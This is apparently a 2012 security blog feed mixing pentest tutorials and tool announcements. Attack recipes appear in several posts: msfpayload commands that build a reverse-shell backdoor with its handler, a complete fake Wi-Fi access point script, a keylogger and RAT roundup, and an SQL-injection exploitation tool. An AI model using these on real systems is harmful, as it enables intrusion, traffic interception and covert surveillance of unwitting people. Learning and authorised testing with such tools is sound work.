Automatic scanning has worth, automatic scanner save time and can do work efficiently. There are various automatic tools are available on public some for web application vulnerability scanning and for network or system level scanning. Nikto is a wonderful open source tool to analyze a web server for misconfiguration and for the common vulnerability but Nikto is not a single player in information security and penetration testing, there is another a tool called Web-Sorrow.

web-sorrow is a perl based tool used for checking a Web server for misconfiguration, version detection, enumeration, and server information. what is's NOT:

Vulnerably scanner
Inspection proxy
DDoS tool
Exploitation framework

usage:

   -host [host] -- Defines host to scan.
   -proxy [ip:port] -- use a proxy server
   -S -- Standard misconfig and other checks
   -Eb -- Error Begging. Sometimes a 404 page contains server info such as daemon or even the OS
   -auth -- Dictionary attack to find login pages (not passwords)
   -cmsPlugins [dp | jm | wp | all] -- check for cms plugins. dp = drupal, jm = joomla, wp = wordpress (db's a bit outdated 2010)
   -I -- Find interesting strings in pages (very verbose)
   -Fd -- look for common interesting files and dirs
   -Ws -- look for Web Services on host. such as hosting porvider, blogging service, favicon fingerprinting, and cms version info
   -e -- everything. run all scans

EXAMPLES:

basic: perl Wsorrow.pl -host scanme.nmap.org -S

look for login pages: perl Wsorrow.pl -host 192.168.1.1 -auth

most intense scan possible: perl Wsorrow.pl -host 192.168.1.1 -e

IT Auditing Fundamentals – Theoretical to Practical

noreply@blogger.com (Irfan Shakeel) — Wed, 04 Apr 2012 17:43:00 +0000

Information security is a vast field and has a broad interest there are so many penetration tester and ethical hacker out there that provides there services for network and web application testing. IT auditing is an essential part of today networks, network can be a small (LAN) and a big both are requires auditing.

IT auditing is not directly reflect the image of penetration testing and vulnerability assessment because there are multiple types of audit, its all depend on the objectives and the goals. An organization uses IT auditing to control the flow of information, to find the network weaknesses, policies, backup procedure, patching and to ensure the protection of users and customer information, well as said earlier its all depend on the goal.

Generally IT audit means to find the hardware’s and software’s that are associated with the network, like IT auditing can be used to track

Partition
Sound cards, Videos cards, LAN cards and other
System component
Installed software’s (including OS)
Security setting

A quick example of an IT audit result can be see in this picture.

Auditing Network Security

As the security is an important part of IT audit so how an auditor can perform network security test, information gathering is the first step of it, gather maximum information about the network.

What actually a network is?
What is the network topology?
How many devices are associated with the network?
How many hosts are alive?
What are the weaknesses of the network?
Which operating system are used on most of the host?
Is patch management work?
How to break network security?
How to exploit a host? To gain the access on the network.

So these are the main question of network security auditing and an auditor supposed to give the detail answer of these questions.

Tools are the essential component of any test including network security auditing, there are both open source and commercial tools are available for this purpose. Nmap, Openaudit and nessus are the best tools for this purpose.

Network mapper (Nmap) the best tool for multiple purposes, basically it is a network scanner and a port scanner utility but in this tutorial we will use it for auditing network security. Zenmap is a GUI of nmap, while nmap is a command line tool.

Let start with the first phase, what is a network ? Network topology, number of host, alive host, open ports, services and others can be find by using nmap.

On the target box enter the IP of the target but for auditing case I want to scan the whole network that is why I have used class C IP subnet. Intense scan is a famous and it gives you the complete picture of the network while if you want just ping than you can do this and if you want nmap to scan a specific port Intense scan, all TCP ports and than define the range of the ports.

By looking the result you can realize the alive host and the open ports even we can find the topology look at the picture below.

The important picture that give you all the information about any host including the operating system, IP address, MAC address, open ports, operating system class, up time, last boot time and many more.

So after this quick scan an auditor has so many information about a network and in my views the more information more the chance of the success. Now the next step would be to find the weaknesses (vulnerabilities) that cause a network to exploit.

Vulnerability Assessment

This is another an important step for network security auditing, vulnerabilities assessment is a process to find the vulnerability on a system and a network. There are different kind of vulnerability can be find on a system like the high risk vulnerability and low risk vulnerability. Usually the high risk vulnerabilities like :

Buffer overflow
Default password
Known back-doors
Poor/mis configuration
Out dated software’s

If we see as a hacker/attacker perspective than these vulnerabilities can cause a network to be compromise so a network security auditor is responsible to find the vulnerabilities and suggest something (technical stuffs) to fix the vulnerabilities.

There are different vulnerability scanners are available on both open source and commercial platform but make sure there are some vulnerability scanner for web application but in this article our focus is network vulnerability scanner. Nessus, OpenVAS and Retina vulnerability scanner and management are the wonderful tools for this purpose, before going to the practical aspect I want to introduce false positive result/response.

False positive means an incorrect result, a software may find a vulnerability that you want it to find, if you think that false positive response is not a matter than you are wrong it takes your time. Keep in mind about false positive result before deciding a software for vulnerabilities assessment.

In this article we will discuss Nessus and we will use Nessus as a vulnerabilities scanner and assessment tool, nessus is a very power tool that can used for multiple purposes from network vulnerabilities scanning to web vulnerability scanning, it can be used for:

Vulnerability scanning
Vulnerability management
Configuration auditing
Log management
Network discovery

Now why nessus and what nessus can do for us, if we are discussing about passive scanning than is a tool to find:

SSL certificate
Host file detection
Host services detection
Open port detection
Vulnerability detection (It suggests the solution too)
Internal IP address detection
VPN detection
Firewall, IDS and IPS detection
Proxy detection
Real time DNS traffic
Real time web traffic
More

For detection purposes the real weapon of Nessus is SYN packets because every operating system uses SYN packets in a unique way so by using the SYN packets Nessus discover the host and the services, as in a basic DOS attack theory the SYN packets can be used for SYN flooding so an auditor must take care these aspect of vulnerability assessment. Your test must not be count as a Denial of service attack for a network.

Vulnerability monitoring that is used in Nessus vulnerability scanner are CVE (Common vulnerability and exposure) and CPE, beside auditing and analyzing host, port, services and vulnerability nessus can be used to monitor real time activities like:

DNS (DNS lookup analysis)
Facebook (Log in/ log out, user ID analysis)
SMTP (source and sink of an email)
SMB
Twitter (Log in/ log out and other activity analysis)
Database (SQL,Oracle and other database analysis)
More..

Continuous monitoring or real time monitoring reduce the chance of the active scanning so as a economical aspect it is a good process and highly recommended because active scanning means operation or test on all the network from physical layer to application layer and it takes time, money, human effort (more engineer required) and the process may slow down the network or if the test is not perform carefully than there is chance of denial of service.

As we have discussed most of the theorical, economical and technical side of this test but before going to the example of test I want to let you know about an important side of the picture, let suppose an network security auditor/ penetration tester going to conduct a test on a large enterprise network keep in mind that these sort of network usually has web application server or may be some of the applications are enable for web. So in this case web server security monitory is also a necessary part and the web applications are the most common victim. That is why I choose nessus for vulnerability assessment because it provides an effective platform to perform a test on web application as well as network.

Nessus has designed to check each and every port of a web application and other services whether it is an uncommon port, the depth analysis of web application provides:

Analysis of HTTP and HTTPS services
Analyze all the website that is host on a server
Analyze SSL certificate, expiry of SSL certificate and more
Analyze content for insecure JavaScript that is lead towards the code injection attack

Second part of this series article will be publish!

Pentest.sh Penetration Testing Script for Backtrack 5

noreply@blogger.com (Irfan Shakeel) — Mon, 26 Mar 2012 14:58:00 +0000

Penetration testing and Ethical hacking can be done by manually and automatically, both manual and automatic vulnerability scanning and hacking has their own importance like automatic process save time while manual hacking can find more vulnerabilities and so on. There are so many tools and techniques has been discussed before but in this article I will share a wonderful script written by phillips321 that can make the job of information gathering and enumeration easy.

The script has been designed for backtrack 5 operating system and it can work on backtrack 5 R1 too, the dependencies and the tools that has been mentioned in the script are :

#       nmap
#       sslscan
#       gnome-web-photo
#       arp-scan
#       dialog
#       onesixtyone
#       amap

On your backtrack 5 kindly use the terminal to install the dependencies by using

apt-get install sslscan gnome-web-photo arp-scan dialog

The script as follows

#!/bin/bash
#__________________________________________________________
# Author:     phillips321 contact through phillips321.co.uk
# License:    CC BY-SA 3.0
# Use:        All in one pentest script designed for bt5
# Released:   www.phillips321.co.uk
version=2.1
# Dependencies:
#       nmap
#       sslscan
#       gnome-web-photo
#       arp-scan
#       dialog
#       onesixtyone
#       amap
# backtrack users can apt-get install sslscan gnome-web-photo arp-scan dialog
#
# ToDo:
#       nikto
#       add ability to launch nesssus against targets
#       ldapminer: wine ldapminer.exe -d -h ${ip}
#       add nfs connect followed by tree command
#       add snmp test using swaks --to user@example.com --server test-server.example.net
#       add uniscan http://${ip}:${port}/ | tee ${ip}.${port}.uniscan.txt

Get the complete script from here.

Since it is a bash script so all you need to do is to just copy the script and paste on your text editor "gedit" in backtrack 5 and then save it to whatever.sh

Open the terminal, locate the directory where you have saved the script before and launch the script, for example

root@bt:~/Desktop# sh ehacking.sh

Share your experience with the script.

BackTrack 5 R2 – VirtualBox Guest Additions + USB Issues Fixes

noreply@blogger.com (Irfan Shakeel) — Fri, 23 Mar 2012 14:36:00 +0000

VirtualBox is of course the most suitable virtualization solution to run BackTrack. Unfortunately, with this latest version of BackTrack, the VirtualBox Guest Additions cannot be installed on a fresh new install. Fortunately after some modifications, everything can be fixed to compile these additions for the 3.2.6 Linux Kernel of BackTrack 5 R2.

Download and Install

BackTrack: http://www.backtrack-linux.org/downloads/
VirtualBox + Oracle VM Extension Pack: https://www.virtualbox.org/wiki/Downloads

If you want support for USB 2.0 devices you must download and install Oracle VM Extension Pack for VirtualBox!

I will not describe the steps to install BackTrack on VirtualBox. A lot of tutorials can be found on the Internet to upgrade to BackTrack 5 R2 or to makea fresh install. But here are some screenshots about the VirtualBox configuration for my MacBook Air i7 1.8Ghz.

Issue #1 (solved): USB device descriptor error

usb 1-1: Device descriptor read/8, error -110
usb 1-1: Device descriptor read/64, error -110

Solution

Number of Processor for the Guest OS must be set to 1 or eventually 2…
For example, my MacBook Air has a Core i7 inside, multithreading displays 4 virtual cores. So I have to set a maximum of 2 cores to BackTrack VM Guest to fix this issue. (Even if the recommended number of cores VirtualBox displays is 4).

Issue #2 (solved): VirtualBox Guest Additions

When you try to install the VirtualBox Guest Additions, these two kinds of errors can occur and lead to a vboxguest kernel extension impossible to load.

The headers for the current running kernel were not found. If the following module compilation fails then this could be the reason.

and

Building the main Guest Additions module ...fail!
(Look at /var/log/vboxadd-install.log to find out what went wrong)

Both issues result to:

Starting the VirtualBox Guest Additions ...fail!
(modprobe vboxguest failed)

Solution

apt-get install linux-headers-$(uname -r) linux-headers xserver-xorg xserver-xorg-core file-roller # file-roller is not needed, but recommended
cd /usr/src/
tar jxf linux-source-3.2.6.tar.bz2
cd /usr/src/linux-headers-3.2.6/include/
rm asm
ln -s /usr/src/linux-source-3.2.6/arch/x86/include/asm asm
cd /lib/modules/3.2.6/
ln -s /usr/src/linux-headers-3.2.6 build

Ready to install VBOXADDITIONS :-)

Verifying archive integrity... All good.
Uncompressing VirtualBox 4.1.10 Guest Additions for Linux..........
VirtualBox Guest Additions installer
Removing installed version 4.1.10 of VirtualBox Guest Additions...
tar: Record size = 8 blocks
Removing existing VirtualBox DKMS kernel modules ...done.
Removing existing VirtualBox non-DKMS kernel modules ...done.
Building the VirtualBox Guest Additions kernel modules
Building the main Guest Additions module ...done.
Building the shared folder support module ...done.
Building the OpenGL support module ...done.
Doing non-kernel setup of the Guest Additions ...done.
You should restart your guest to make sure the new modules are actually used
Installing the Window System drivers
Installing X.Org Server 1.7 modules ...done.
Setting up the Window System to use the Guest Additions ...done.
You may need to restart the hal service and the Window System (or just restart
the guest system) to enable the Guest Additions.
Installing graphics libraries and desktop services components ...done.
Press Return to close this window...

Good job, reboot and enjoy adaptative screen resolution, smooth mouse moves, folder sharing, copy/paste from Host to Guest and vis versa, etc.

About the Author

Thireus Security Engineer/Consultant, Intern at Thales Communications & Security.

IT Security and Telecommunication Engineering Student at ENSEIRB-MATMECA & Master 2 CSI University of Bordeaux 1 (Bordeaux, France). Founder and co-administrator of DareYourMind.net. Author of various security and privacy related articles on blog.thireus.com. Active member in the HackinTosh and JailBreak communities.

Bugtraq-I Distribution for Pentesting & Forensics

noreply@blogger.com (Irfan Shakeel) — Wed, 14 Mar 2012 14:54:00 +0000

Bugtraq system offers the most comprehensive distribution, optimal, stable and automatic security to date. Bugtraq is a distribution based on the 2.6.38 kernel has a wide range of penetration and forensic tools. Bugtraq can be installed from a Live DVD or USB drive, the distribution is customized to the last package, configured and updated the kernel. The kernel has been patched for better performance to recognize a variety of hardware, including wireless injection patches pentesting that other distributions do not recognize.

Some of the special features that you can appreciate are:

Administrative improvements of the system for better management of services.
Expanded the range of recognition for injection wireless drivers.
Patching the kernel 2.6.38 to recognize 4 gigs of RAM in 32-bit.
Tools perfectly configured, automated installation scripts and tools like Nessus,
OpenVAS, Greenbone, Nod32, Hashcat, Avira, BitDefender, ClamAV, Avast,
AVG, etc...
Unique Scripts from Bugtraq-Team (SVN updates tools, delete tracks,
backdoors, Spyder-sql, etc.)
Stability and performance optimized: Enhanced performance flash and java and
start purging unnecessary services. So that the user can use only the services you
really want.
It has incorporated the creation of the user in the installation, which is created
with all system configurations.
We are the distribution and Forensic Pentesting with more tools built and
functional, well organized menu without repetition of the same to avoid
overwhelming the user.

WIRELESS AND BLUETOOH SUPPORTED PATCHES

Wireless chipsets:

adm8211

ath5k

ath9h

ar9170

b43

b43legacy

iwl3945

iwlagn

ipw2100

ipw2200

libertas_cs (Libertas)

ub8xxx (Libertas)

p54pci

p54usb

rt2400pci (rt2x00)

rt2500pci (rt2x00)

rt2500usb (rt2x00)

rt61pci (rt2x00)

rt73usb (rt2x00)

rtl8180 (Realtek)

rtl8187 (Realtek)

zd1211rw

Bluetooth drivers:

bluetooth

btusb

hci_uart

btsdio

btuart_cs

bluecard_cs

bfusb

Kindly click on an image to see the full and the clear view

For download it and more additional information, visit :

http://www.bugtraq-team.com

Languages available in Spanish and English

Spy Softwares Keyloggers & RAT Review

noreply@blogger.com (Irfan Shakeel) — Mon, 12 Mar 2012 19:07:00 +0000

Spy software's (Keylogger, RAT) are the programs that has an ability to monitor a computer and to make log files for every activities, some keylogger works remotely and they can send the log files via email or FTP. There are so many keyloggers are available on the Internet and the usage of keyloggers depends on the need and requirement. Since we does not encourage the wrong usage of technology and in this article we will review some best keyloggers but the aim is not to hack someone via keylogger but the aim is to monitor the child's and employee.

There are so many peoples has requested me to make an article on keylogger that is why I have decided to review some keyloggers.

AllIn One Keylogger

This is Invisible Keylogger surveillance software , Keystrokes Recorder, Spy Software tool that registers every activity on your PC to encrypted logs. The Keylogger Software allows you to secretly track all activities from all computer users and automatically receive logs to a desire e-mail/FTP/LAN accounting.

Some interesting feature:

Keystrokes Logging (Key Logging)
Chat / Instant Message Recording (Chat Logger/IM Logger)
Web Recording (Web Logger/Internet Logger
Screenshot Logging (Spy Camera)
Microphone Logging
Log files Encryption
Anti-Spy Protection
Email Delivery
FTP Delivery
Block/filter Unwanted URLs
Disable Unwanted Software's
Auto Uninstall

Download

SniperSpy Remote Spy Software

SniperSpy allows you to remotely watch your computer like a television! Watch what happens on the screen LIVE! The only remote monitoring software with a SECURE control panel!

The software also saves screenshots along with text logs of chats, websites, keystrokes in any language and more. Remotely view everything your child, employee or anyone does while they use your distant PC. Includes LIVE admin and control commands!

Some features:

Keystrokes in Most Languages
Full Chat Conversations
Application Session Durations
Real Time Screen Viewer
Real Time Keystroke Viewer
Reboot / Shutdown / Logoff
HTTPS Secured Control Panel
Remote System Information
Searchable Logs
Remotely Deployable
Remote Uninstall

Download

NetSpy Pro

It is an amazing product that has an ability to monitor the entire network, Net Spy Pro is the latest in employee network monitoring software. This program allows you to monitor and control all user activity on your network in real time from your own workstation.

Some features:

View Real Time Screens, Events and Keystrokes!
View Browser Favorites
View Open Ports
View Active Processes, Services and System Info
Chat / IM Conversations
Keystrokes Typed
Web Sites Visited
Emails Typed or Viewed
Applications Executed
Screenshots Capturing
Full Remote Control

Download

How to Create a Fake Access Point Backtrack 5

noreply@blogger.com (Irfan Shakeel) — Sat, 10 Mar 2012 15:29:00 +0000

Rouge access point or a fake access point is the real threat for WiFi users, Airsnarf - Rogue Access Point and Karmetasploit- Backtrack 5 Tutorial has been discussed before and in this article I will a wonder tutorial from a wonderful that discuss how to create a fake access point on backtrack 5. There are a lot of Tutorials and Scripts for setting up a Fake AP, The “Gerix” tool also have an option to auto set a Fake AP (for some reason this tool never worked for me).

I started to setup my fake AP and had run into some trouble for a strange reason.

I decided to put my experience here hopefully you’ll find it useful.

Started by putting my Wlan interface in monitor mode

root@Blackbox:~/fakeap# airmon-ng start wlan1
Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID     Name
1558    dhclient
Interface       Chipset         Driver
wlan1           Realtek RTL8187L        rtl8187 - [phy1]SIOCSIFFLAGS: Unknown error 132
                                (monitor mode enabled on mon0)

I noticed the following error: “Unknown error 132″
Tried using airodump-ng to see what happens…

root@Blackbox:~/fakeap# airodump-ng mon0
ioctl(SIOCSIFFLAGS) failed: Unknown error 132

Got the same error.

The solution was simply to unload the RTL8187 and Load the R8187 driver instead as follows:

root@Blackbox:~/fakeap# rmmod rtl8187
root@Blackbox:~/fakeap# modprobe r8187

Tried putting wlan In monitor mode again

root@Blackbox:~/fakeap# airmon-ng start wlan1
Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID     Name
1558    dhclient
Interface       Chipset         Driver
wlan1           RTL8187         r8187 (monitor mode enabled)

Well, that fixed the problem

root@Blackbox:~/fakeap# iwconfig
lo        no wireless extensions.
eth3      no wireless extensions.
wlan1     802.11b/g  Mode:Monitor  Channel=10  Bit Rate=11 Mb/s
          Tx-Power=5 dBm
          Retry:on   Fragment thr:off
          Link Quality=0/100  Signal level=50 dBm  Noise level=-156 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

Now we can proceed to the fake ap setup process

1. Install a DHCP Server

apt-get install dhcp3-server

2. Edit “/etc/dhcp3/dhcpd.conf” as follows (You can change ip address, pool and dns server as needed):

ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 10.0.0.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 10.0.0.255;
option routers 10.0.0.254;
option domain-name-servers 8.8.8.8;
range 10.0.0.1 10.0.0.140;
}

3. Put your wlan in monitor mode

airmon-ng start wlan1

4. Start airbase-ng, you will need to specify the AP SSID and channel number

airbase-ng -e FreeWifi -c 11 -v wlan1 &

5. Airbase will create a new adapter “at0″ you will need to enable it and assign it with an ip address and subnet mask, the ip address you assign to this interface will be the default gateway that you specified in the dhcpd.conf file.

ifconfig at0 up
ifconfig at0 10.0.0.254 netmask 255.255.255.0

6. Add a route

route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254

7. Setup ip tables

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT

• Eth3 is my external interface which is connected to the internet change it to whatever yours is

iptables -t nat -A POSTROUTING -o eth3 -j MASQUERADE

8. Clear dhcp leases

echo > '/var/lib/dhcp3/dhcpd.leases'

9. Create a symlink to dhcpd.pid (skipping this may cause an error when starting dhcp server)

ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid

10. Start the DHCP server

dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 &

11. Don’t forget to enable IP forwarding

echo "1" > /proc/sys/net/ipv4/ip_forward

That’s All Folks!

I have created a simple bash script to automate this process you will just need to change it to suit your configuration.

#!/bin/bash

echo "Killing Airbase-ng..."
pkill airbase-ng
sleep 2;
echo "Killing DHCP..."
pkill dhcpd3
sleep 5;

echo "Putting Wlan In Monitor Mode..."
airmon-ng stop wlan1 # Change to your wlan interface
sleep 5;
airmon-ng start wlan1 # Change to your wlan interface
sleep 5;
echo "Starting Fake AP..."
airbase-ng -e FreeWifi -c 11 -v wlan1 & # Change essid, channel and interface
sleep 5;

ifconfig at0 up
ifconfig at0 10.0.0.254 netmask 255.255.255.0 # Change IP addresses as configured in your dhcpd.conf
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254

sleep 5;

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o eth3 -j MASQUERADE # Change eth3 to your internet facing interface

echo > '/var/lib/dhcp3/dhcpd.leases'
ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid
dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 &

sleep 5;
echo "1" > /proc/sys/net/ipv4/ip_forward

The over all credit goes to Exploit KB

Wordpress Security & Vulnerability Scanning Services

noreply@blogger.com (Irfan Shakeel) — Sat, 03 Mar 2012 18:11:00 +0000

Wordpress is one of the best and most popular content management system (CMS), since wordpress is famous and open source that is why hackers usually target wordpress software's and the websites / blogs that are using wordpress. Hackers normally use an innocent blogs for their bad purposes like malware spreading, phishing and other attack so it is always good to secure your website before a hacker exploit it.

Wordpress security plugins are not enough because plugins itself contain several vulnerabilities and sometimes an attacker take advantages of the plugins to hack into a wordpress software. The famous attack like timthumb script vulnerability and blackhole exploit kit.

Since Ethical hacking means to secure a technology that is why we have several packages to secure the wordpress and web server security.

Wordpress Security Audit

If you don't want to be the next victim of the hackers then find the vulnerabilities on your website before hackers find it. Website hacking is very common and there are hundreds of thousands websites are hacked everyday. So make sure that you will not be the next victim.

Wordpress Security Audit is the basic wordpress security package that can tell you about your wordpress security and weaknesses.

Wordpress Security Shield

Your wordpress website might contain so many vulnerabilities that an attacker can exploit to hack into your website and the wordpress security audit can tell you about those vulnerabilities but your website must not have these vulnerabilities so you need to remove it and you need to make sure that your website is secure.

Wordpress security shield is the right package to secure your wordpress website, this package is also known as Wordpress Security Audit Plus.

Wordpress Bullet Proof Security

Wordpress bullet proof security or wordpress security shield plus is the package to ensure the best security for your website. If you want to protect your website from password based attack, SQL injection, Cross site scripting and others application level attack then Wordpress bullet proof security is the best package for you.

Wordpress Secure Installation & Security Configuration

If you have not installed wordpress on your web server yet or if you want to start your own blog based on wordpress, in both cases the wordpress secure installation package will help you. In this package we will install a wordpress software with respect to the security point of view, we configure our own scripts and other plugins with basic SEO and other necessary plugins or training.

Hacked Wordpress Website Recovery

If an attacker has previously hacked your website and insert their malware then you need qiuck recovery, this package is to recover the hacked website, remove the possible backdoor, spamming codes and any other sort of malware. Security configuration for future.

The complete detail with prize will be deliver upon request, kindly use the contact form for more information.

The Mole(SQL Injection exploitation tool) v0.3 released

noreply@blogger.com (Irfan Shakeel) — Fri, 02 Mar 2012 17:57:00 +0000

The Mole is an automatic SQL Injection exploitation tool. Only by providing a vulnerable URL and a valid string on the site it can detect the injection and exploit it, either by using the union technique or a boolean query based technique. The Mole features and tutorial has been discussed before but the new version of Mole (v3.0) has been released and available to download.

Features

Support for injections using Mysql, SQL Server, Postgres and Oracle databases.
Command line interface. Different commands trigger different actions.
Auto-completion for commands, command arguments and database, table and columns names.
Support for filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of creating new ones easily.
Exploits SQL Injections through GET/POST/Cookie parameters.
Developed in python 3.
Exploits SQL Injections that return binary data.
Powerful command interpreter to simplify its usage.

Current Release: v0.3 (2012-03-02)

Windows 32bit executable: themole-0.3-win32.zip
Tarball-gzipped format: themole-0.3-lin-src.tar.gz
Zip format: themole-0.3-win-src.zip

Current Bug-Free version

Even though we want to keep the release up-to-date, it is impossible to make one for every single patch we have applied to the current version to fix a bug. We strongly recommend using the bugfix branch from our repository. To get it, execute:

git clone -b bugfix git://git.code.sf.net/p/themole/code themole-code

In order to put it up to date, before using it, update it by executing:

git pull origin bugfix

The Mole's release 0.3 is out! Several bugfixes have been made and new features were introduced. As:

* Enabled injection through cookie paramters.
* New filtering mechanism enabling better manipulation and easier filter development.
* Added several of those filters.
* SQL Injections that return binary data are now exploitable.
* DMBS credentials listing.

The Mole SQLi Exploitation Tool Tutorial

Complete tutorial with video explanation can be find here.

Backtrack 5 R2 Release - Update to Backtrack 5 R2

noreply@blogger.com (Irfan Shakeel) — Sat, 25 Feb 2012 15:08:00 +0000

How to update and upgrade your current (backtrack 5 R1) backtrack machine into the latest version backtrack 5 R2, however backtrack 5 R2 will be release on 1st March but the kernel of BT5 R2 has been arrived and you can update it by yourself or wait for the official release. The new kernel of 3.2.6 BT5 R2 will provide a more stable and complete penetration testing environment than ever before.

Open the terminal and update your backtrack 5 R1 installation.

apt-get update
apt-get dist-upgrade
reboot

Now you have the latest kernel.

OPTIONAL – Once rebooted, log back in, and get your pretty splash screen back.

fix-splash
reboot

On the next reboot, you should see the red console splash screen appear.
Verify that you are running a 3.2.6 kernel:

uname -a

You should see something like “Linux bt 3.2.6 …”
Feel free to install any or all of the new tools featured in BackTrack 5 R2:

apt-get install pipal findmyhash metasploit joomscan hashcat-gui golismero easy-creds pyrit sqlsus vega libhijack tlssled hash-identifier wol-e dirb reaver wce sslyze magictree nipper-ng rec-studio hotpatch xspy arduino rebind horst watobo patator thc-ssl-dos redfang findmyhash killerbee goofile bt-audit bluelog extundelete se-toolkit casefile sucrack dpscan dnschef

Load the new security update and then upgrade it

echo "deb http://updates.repository.backtrack-linux.org revolution main microverse non-free testing" >> /etc/apt/sources.list
apt-get update
apt-get dist-upgrade

It will be asked about the revision make sure to choose all by default and hit enter.

Restart your distribution with the services.

Backtrack 5 R2 will be officially release in March 1 with the complete information.
Source

DPScan Drupal Security Scanner Tutorial

noreply@blogger.com (Irfan Shakeel) — Sat, 25 Feb 2012 14:45:00 +0000

There are different CMS (content management system) are available like wordpress, Joomla, light CMS and Drupal. Security of each CMS is very important and as a penetration tester point we need to make a website secure by doing a penetration testing on it. There are different tools are available to enumerate into wordpress and joomla and to find the known vulnerabilities in wordpress and joomla but there is no tool for other common content management system like drupal.

Ali Elouafiq has released a wonderful tool to enumerate into drupal based CMS, this is the simple python script and anyone can easily use it. This tutorial will show you how DPScan enumerate the modules used by the drupal CMS.

First of all go and download DPScan, I am using backtrack 5 R1 machine for this tutorial that has python by default but if you are using some other operating system like Windows and other Linux distribution then install python first.

Open your terminal and then locate the directory where you have download the python script of DPScan, remember you can copy the script and then paste in your word editor then save it to whatever.py

The best practice is to download and then unzip the script, I have downloaded and unzip the script in my desktop and then locate the desktop is the terminal then the command is like this:

root@bt:~/Desktop# python DPScan.py
DRUPAL Modules Enumerator v0.1beta-- written by Ali Elouafiq 2012
<ScriptName> [filename.txt]
<ScriptName> [URL]
<ScriptName> [URL] user password // FOR HTTP AUTHORIZATION

A simple enumeration

root@bt:~/Desktop# python DPScan.py www.mtv.co.uk
node
user_optin
fckeditor
system
gsa
mtv_videobrowse
nice_menus
user
cck
top_tabs
panels
jquery_update
root@bt:~/Desktop#

How to Hack Linux -Metasploit Tutorial Backtrack 5 R1

noreply@blogger.com (Irfan Shakeel) — Sun, 19 Feb 2012 07:15:00 +0000

Metasploit is a wonderful tool for penetration testing that contain a database of publicly known exploits for various operating system and software's, we have discussed how to hack windows via metasploit on backtrack Linux but how to hack Linux (Ubuntu and any other Linux) via metasploit. Metasploit contain several exploits for Linux operating system too but we can windows exploit for Linux. This is the video tutorial in which I will show you how to hack a Linux operating system because in the penetration testing sometimes we need to get the root access on the server or computer.

This video let you know about the weaknesses of wine (an application to run windows executable on Linux), yes an attacker take advantage of wine to execute their windows backdoor on Linux machine to get the full access on the computer.

root@bt:~# msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.12 lport=4444 X > backdoor.exe

Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"lhost"=>"192.168.1.12", "lport"=>"4444"}

Metasploit commands

msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.12
lhost => 192.168.1.12
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.12:4444
[*] Starting the payload handler...

Protecting Your Wifi-Connections - ISPs are not Your Mothers

noreply@blogger.com (Irfan Shakeel) — Wed, 15 Feb 2012 15:55:00 +0000

If you have recently got a new Wi-Fi connection then you will need to know the best ways to protect it. The problem with Wi-Fi is the fact that, as it is ranged, anyone can connect to it if you leave it unprotected.

Most routers will come equipped with a password; however you need to make sure if yours is activated, as there are many problems associated with routers that don’t. If you are unsure of how to go about doing this, it is usually a fairly simple process – websites such as Broadband Expert will show you how best to do it, so it is good to look there.

(Courtesy of StephenEdgar - Netweb)

Unfortunately there are a lot of people who, even though they are aware of the risks, do not protect their Wi-Fi with a password, even though this is incredibly easy to do. They do not seem to realize just how serious it can be without a password, as many people will attempt to gain access to any internet connection that is not protected with tools given by the internet provider.

The thing is, any connection to the internet is easily located to you – when browsing it is possible to trace it back to you should anything illegal occur. And unfortunately, in the past it has been the case where people have hijacked the internet connection of other people and used it for illegal purposes, causing some people to lose their internet connection while it was sorted out, causing problems for them in the future as well.

At times it can also be possible that people will visit malicious sites or will be able to affect the overall integrity of your computer system, causing a lot of problems for you and any hardware you use to connect with the internet connection. Luckily it is really easy to protect yourself against this kind of thing, but you need to make sure that you do have passwords activated.

(Courtesy of goodrob13)

The reason why you may not have known about the overall importance of protecting your internet connection is due to the fact that it is not the job of the internet provider to tell you about this. It is up to you to ensure that you Wi-Fi connection is secure, and you must take the steps to do this, although sometimes internet providers will give you extra tips and tools for remaining safe when using wireless.

You can also look for help on Broadband Expert, which has many blog posts on how to best protect yourself from these kinds of crimes, ensuring that you remain safe while online. You can also compare different broadband connections locally, so you can get the best and safest deal for you.

In the end it is up to you to ensure that your connection is safe. As said, many routers will provide some form of connection as default, but you need to make sure of this, and if not you may want to add some extra layers on top, just so that you know you are the only one using it.

After all, if you are limited on your data usage per month then you will not want anyone else using it, as it could cost you a lot in extra fees for internet data which you didn’t use, meaning it is of the utmost importance to keep your internet connection safe and secure, so that only you, the rightful owner of the connection, can use it every day. This is the only way to keep it entirely safe, and it is advised that you do this.

About the Author
This is a guest article by Ruben Corbo, a writer for the website Broadband expert where you can find internet service providers in your area and compare prices on different deals for your mobile broadband needs.

Top Security Apps for iOS

noreply@blogger.com (Irfan Shakeel) — Fri, 10 Feb 2012 18:17:00 +0000

Apps can be built for every purpose. They can be simple games, or they can add new features to your phone or tablet. One of the coolest functions that apps can provide is security. Through a combination of iOS and a mobile broadband connection, home security from anywhere is as simple as launching an app. I've sorted through a number of the apps on the iTunes App Store in search of the best mobile and home security apps for iOS.

Snap

